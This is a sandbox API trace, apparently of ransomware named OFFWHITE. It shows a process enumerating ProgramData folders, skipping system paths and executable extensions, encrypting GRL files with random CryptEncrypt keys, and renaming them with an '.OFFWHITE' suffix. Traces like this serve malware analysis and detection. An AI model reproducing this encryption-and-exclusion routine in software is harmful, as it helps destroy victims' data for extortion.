[0144.179] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\MF\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\MF\\") returned="C:/Users\\All Users\\Microsoft\\MF\\" [0144.179] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\MF\\", lpString2="Active.GRL" | out: lpString1="C:/Users\\All Users\\Microsoft\\MF\\Active.GRL") returned="C:/Users\\All Users\\Microsoft\\MF\\Active.GRL" [0144.179] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.179] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.179] PathFindExtensionW (pszPath="Active.GRL") returned=".GRL" [0144.179] lstrcmpiW (lpString1=".GRL", lpString2=".exe") returned 1 [0144.179] lstrcmpiW (lpString1=".GRL", lpString2=".log") returned -1 [0144.179] lstrcmpiW (lpString1=".GRL", lpString2=".cab") returned 1 [0144.180] lstrcmpiW (lpString1=".GRL", lpString2=".cmd") returned 1 [0144.180] lstrcmpiW (lpString1=".GRL", lpString2=".com") returned 1 [0144.180] lstrcmpiW (lpString1=".GRL", lpString2=".cpl") returned 1 [0144.180] lstrcmpiW (lpString1=".GRL", lpString2=".ini") returned -1 [0144.180] lstrcmpiW (lpString1=".GRL", lpString2=".dll") returned 1 [0144.180] lstrcmpiW (lpString1=".GRL", lpString2=".url") returned -1 [0144.180] lstrcmpiW (lpString1=".GRL", lpString2=".ttf") returned -1 [0144.180] lstrcmpiW (lpString1=".GRL", lpString2=".mp3") returned -1 [0144.180] lstrcmpiW (lpString1=".GRL", lpString2=".pif") returned -1 [0144.180] lstrcmpiW (lpString1=".GRL", lpString2=".mp4") returned -1 [0144.180] lstrcmpiW (lpString1=".GRL", lpString2=".OFFWHITE") returned -1 [0144.180] lstrcmpiW (lpString1=".GRL", lpString2=".msi") returned -1 [0144.180] lstrcmpiW (lpString1="Active.GRL", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0144.180] GetProcessHeap () returned 0x500000 [0144.180] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52e970 [0144.180] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\MF\\Active.GRL" (normalized: "c:\\users\\all users\\microsoft\\mf\\active.grl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0144.181] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=14972) returned 1 [0144.181] GetProcessHeap () returned 0x500000 [0144.181] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0144.181] GetProcessHeap () returned 0x500000 [0144.181] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0144.181] GetProcessHeap () returned 0x500000 [0144.181] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0144.181] GetProcessHeap () returned 0x500000 [0144.181] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0144.181] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.181] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.181] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0144.181] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.181] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.181] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0144.181] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.181] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.181] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295dc90*=0x100) returned 1 [0144.182] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.182] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.182] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0144.182] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x3a7c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.182] SetLastError (dwErrCode=0x0) [0144.182] WriteFile (in: hFile=0x21c, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0144.185] GetLastError () returned 0x0 [0144.185] GetLastError () returned 0x0 [0144.185] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x3b7c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.185] WriteFile (in: hFile=0x21c, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0144.186] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x3c7c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.186] WriteFile (in: hFile=0x21c, lpBuffer=0x52e970*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x52e970*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0144.186] GetProcessHeap () returned 0x500000 [0144.186] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x3a7c) returned 0x5607c8 [0144.186] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.186] ReadFile (in: hFile=0x21c, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x3a7c, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295dec0*=0x3a7c, lpOverlapped=0x0) returned 1 [0144.188] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.188] WriteFile (in: hFile=0x21c, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x3a7c, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295decc*=0x3a7c, lpOverlapped=0x0) returned 1 [0144.188] GetProcessHeap () returned 0x500000 [0144.188] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0144.188] CloseHandle (hObject=0x21c) returned 1 [0144.188] GetProcessHeap () returned 0x500000 [0144.188] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0144.188] GetProcessHeap () returned 0x500000 [0144.188] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0144.188] GetProcessHeap () returned 0x500000 [0144.188] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0144.188] GetProcessHeap () returned 0x500000 [0144.188] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0144.188] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\All Users\\Microsoft\\MF\\Active.GRL" | out: lpString1="C:/Users\\All Users\\Microsoft\\MF\\Active.GRL") returned="C:/Users\\All Users\\Microsoft\\MF\\Active.GRL" [0144.189] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\MF\\Active.GRL", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\MF\\Active.GRL.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\MF\\Active.GRL.OFFWHITE" [0144.189] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\MF\\Active.GRL" (normalized: "c:\\users\\all users\\microsoft\\mf\\active.grl"), lpNewFileName="C:/Users\\All Users\\Microsoft\\MF\\Active.GRL.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\mf\\active.grl.offwhite")) returned 1 [0144.189] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bed1018, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="Pending.GRL", cAlternateFileName="")) returned 1 [0144.189] lstrcmpiW (lpString1="Pending.GRL", lpString2=".") returned 1 [0144.189] lstrcmpiW (lpString1="Pending.GRL", lpString2="..") returned 1 [0144.189] lstrcmpiW (lpString1="Pending.GRL", lpString2="...") returned 1 [0144.189] lstrcmpiW (lpString1="Pending.GRL", lpString2="windows") returned -1 [0144.189] lstrcmpiW (lpString1="Pending.GRL", lpString2="$recycle.bin") returned 1 [0144.190] lstrcmpiW (lpString1="Pending.GRL", lpString2="rsa") returned -1 [0144.190] lstrcmpiW (lpString1="Pending.GRL", lpString2="ntuser.dat") returned 1 [0144.190] lstrcmpiW (lpString1="Pending.GRL", lpString2="programdata") returned -1 [0144.190] lstrcmpiW (lpString1="Pending.GRL", lpString2="appdata") returned 1 [0144.190] lstrcmpiW (lpString1="Pending.GRL", lpString2="program files") returned -1 [0144.190] lstrcmpiW (lpString1="Pending.GRL", lpString2="program files (x86)") returned -1 [0144.190] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\MF\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\MF\\") returned="C:/Users\\All Users\\Microsoft\\MF\\" [0144.190] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\MF\\", lpString2="Pending.GRL" | out: lpString1="C:/Users\\All Users\\Microsoft\\MF\\Pending.GRL") returned="C:/Users\\All Users\\Microsoft\\MF\\Pending.GRL" [0144.190] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.190] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.190] PathFindExtensionW (pszPath="Pending.GRL") returned=".GRL" [0144.190] lstrcmpiW (lpString1=".GRL", lpString2=".exe") returned 1 [0144.190] lstrcmpiW (lpString1=".GRL", lpString2=".log") returned -1 [0144.190] lstrcmpiW (lpString1=".GRL", lpString2=".cab") returned 1 [0144.190] lstrcmpiW (lpString1=".GRL", lpString2=".cmd") returned 1 [0144.190] lstrcmpiW (lpString1=".GRL", lpString2=".com") returned 1 [0144.190] lstrcmpiW (lpString1=".GRL", lpString2=".cpl") returned 1 [0144.190] lstrcmpiW (lpString1=".GRL", lpString2=".ini") returned -1 [0144.190] lstrcmpiW (lpString1=".GRL", lpString2=".dll") returned 1 [0144.190] lstrcmpiW (lpString1=".GRL", lpString2=".url") returned -1 [0144.190] lstrcmpiW (lpString1=".GRL", lpString2=".ttf") returned -1 [0144.190] lstrcmpiW (lpString1=".GRL", lpString2=".mp3") returned -1 [0144.190] lstrcmpiW (lpString1=".GRL", lpString2=".pif") returned -1 [0144.190] lstrcmpiW (lpString1=".GRL", lpString2=".mp4") returned -1 [0144.190] lstrcmpiW (lpString1=".GRL", lpString2=".OFFWHITE") returned -1 [0144.191] lstrcmpiW (lpString1=".GRL", lpString2=".msi") returned -1 [0144.191] lstrcmpiW (lpString1="Pending.GRL", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.191] GetProcessHeap () returned 0x500000 [0144.191] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52e980 [0144.191] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\users\\all users\\microsoft\\mf\\pending.grl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0144.192] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=14972) returned 1 [0144.192] GetProcessHeap () returned 0x500000 [0144.192] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0144.192] GetProcessHeap () returned 0x500000 [0144.192] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0144.192] GetProcessHeap () returned 0x500000 [0144.192] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0144.192] GetProcessHeap () returned 0x500000 [0144.192] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0144.192] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.192] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.192] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0144.192] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.192] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.192] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0144.192] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.192] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.192] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295dc90*=0x100) returned 1 [0144.193] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.193] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.193] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0144.193] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x3a7c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.193] SetLastError (dwErrCode=0x0) [0144.193] WriteFile (in: hFile=0x21c, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0144.195] GetLastError () returned 0x0 [0144.195] GetLastError () returned 0x0 [0144.195] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x3b7c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.195] WriteFile (in: hFile=0x21c, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0144.195] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x3c7c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.195] WriteFile (in: hFile=0x21c, lpBuffer=0x52e980*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x52e980*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0144.196] GetProcessHeap () returned 0x500000 [0144.196] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x3a7c) returned 0x5607c8 [0144.196] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.196] ReadFile (in: hFile=0x21c, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x3a7c, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295dec0*=0x3a7c, lpOverlapped=0x0) returned 1 [0144.199] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.199] WriteFile (in: hFile=0x21c, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x3a7c, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295decc*=0x3a7c, lpOverlapped=0x0) returned 1 [0144.199] GetProcessHeap () returned 0x500000 [0144.199] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0144.199] CloseHandle (hObject=0x21c) returned 1 [0144.200] GetProcessHeap () returned 0x500000 [0144.200] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0144.200] GetProcessHeap () returned 0x500000 [0144.200] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0144.200] GetProcessHeap () returned 0x500000 [0144.200] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0144.200] GetProcessHeap () returned 0x500000 [0144.200] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0144.200] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\All Users\\Microsoft\\MF\\Pending.GRL" | out: lpString1="C:/Users\\All Users\\Microsoft\\MF\\Pending.GRL") returned="C:/Users\\All Users\\Microsoft\\MF\\Pending.GRL" [0144.200] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\MF\\Pending.GRL", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\MF\\Pending.GRL.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\MF\\Pending.GRL.OFFWHITE" [0144.200] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\users\\all users\\microsoft\\mf\\pending.grl"), lpNewFileName="C:/Users\\All Users\\Microsoft\\MF\\Pending.GRL.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\mf\\pending.grl.offwhite")) returned 1 [0144.201] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bed1018, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="Pending.GRL", cAlternateFileName="")) returned 0 [0144.201] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0144.201] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="MSDN", cAlternateFileName="")) returned 1 [0144.201] lstrcmpiW (lpString1="MSDN", lpString2=".") returned 1 [0144.201] lstrcmpiW (lpString1="MSDN", lpString2="..") returned 1 [0144.201] lstrcmpiW (lpString1="MSDN", lpString2="...") returned 1 [0144.201] lstrcmpiW (lpString1="MSDN", lpString2="windows") returned -1 [0144.201] lstrcmpiW (lpString1="MSDN", lpString2="$recycle.bin") returned 1 [0144.201] lstrcmpiW (lpString1="MSDN", lpString2="rsa") returned -1 [0144.201] lstrcmpiW (lpString1="MSDN", lpString2="ntuser.dat") returned -1 [0144.201] lstrcmpiW (lpString1="MSDN", lpString2="programdata") returned -1 [0144.201] lstrcmpiW (lpString1="MSDN", lpString2="appdata") returned 1 [0144.201] lstrcmpiW (lpString1="MSDN", lpString2="program files") returned -1 [0144.201] lstrcmpiW (lpString1="MSDN", lpString2="program files (x86)") returned -1 [0144.201] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\") returned="C:/Users\\All Users\\Microsoft\\" [0144.201] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\", lpString2="MSDN" | out: lpString1="C:/Users\\All Users\\Microsoft\\MSDN") returned="C:/Users\\All Users\\Microsoft\\MSDN" [0144.201] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\MSDN", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\MSDN\\") returned="C:/Users\\All Users\\Microsoft\\MSDN\\" [0144.201] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Microsoft\\MSDN\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\MSDN\\") returned="C:/Users\\All Users\\Microsoft\\MSDN\\" [0144.202] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\MSDN\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\MSDN\\*.*") returned="C:/Users\\All Users\\Microsoft\\MSDN\\*.*" [0144.202] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\MSDN\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0144.208] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0144.208] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0144.208] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0144.208] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0144.208] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="8.0", cAlternateFileName="")) returned 1 [0144.208] lstrcmpiW (lpString1="8.0", lpString2=".") returned 1 [0144.208] lstrcmpiW (lpString1="8.0", lpString2="..") returned 1 [0144.208] lstrcmpiW (lpString1="8.0", lpString2="...") returned 1 [0144.208] lstrcmpiW (lpString1="8.0", lpString2="windows") returned -1 [0144.208] lstrcmpiW (lpString1="8.0", lpString2="$recycle.bin") returned 1 [0144.208] lstrcmpiW (lpString1="8.0", lpString2="rsa") returned -1 [0144.208] lstrcmpiW (lpString1="8.0", lpString2="ntuser.dat") returned -1 [0144.208] lstrcmpiW (lpString1="8.0", lpString2="programdata") returned -1 [0144.208] lstrcmpiW (lpString1="8.0", lpString2="appdata") returned -1 [0144.209] lstrcmpiW (lpString1="8.0", lpString2="program files") returned -1 [0144.209] lstrcmpiW (lpString1="8.0", lpString2="program files (x86)") returned -1 [0144.209] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\MSDN\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\MSDN\\") returned="C:/Users\\All Users\\Microsoft\\MSDN\\" [0144.209] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\MSDN\\", lpString2="8.0" | out: lpString1="C:/Users\\All Users\\Microsoft\\MSDN\\8.0") returned="C:/Users\\All Users\\Microsoft\\MSDN\\8.0" [0144.209] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\MSDN\\8.0", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\MSDN\\8.0\\") returned="C:/Users\\All Users\\Microsoft\\MSDN\\8.0\\" [0144.209] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Microsoft\\MSDN\\8.0\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\MSDN\\8.0\\") returned="C:/Users\\All Users\\Microsoft\\MSDN\\8.0\\" [0144.209] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\MSDN\\8.0\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\MSDN\\8.0\\*.*") returned="C:/Users\\All Users\\Microsoft\\MSDN\\8.0\\*.*" [0144.209] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\MSDN\\8.0\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4c004a, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0144.209] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0144.209] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4c004a, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0144.209] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0144.209] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0144.209] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, 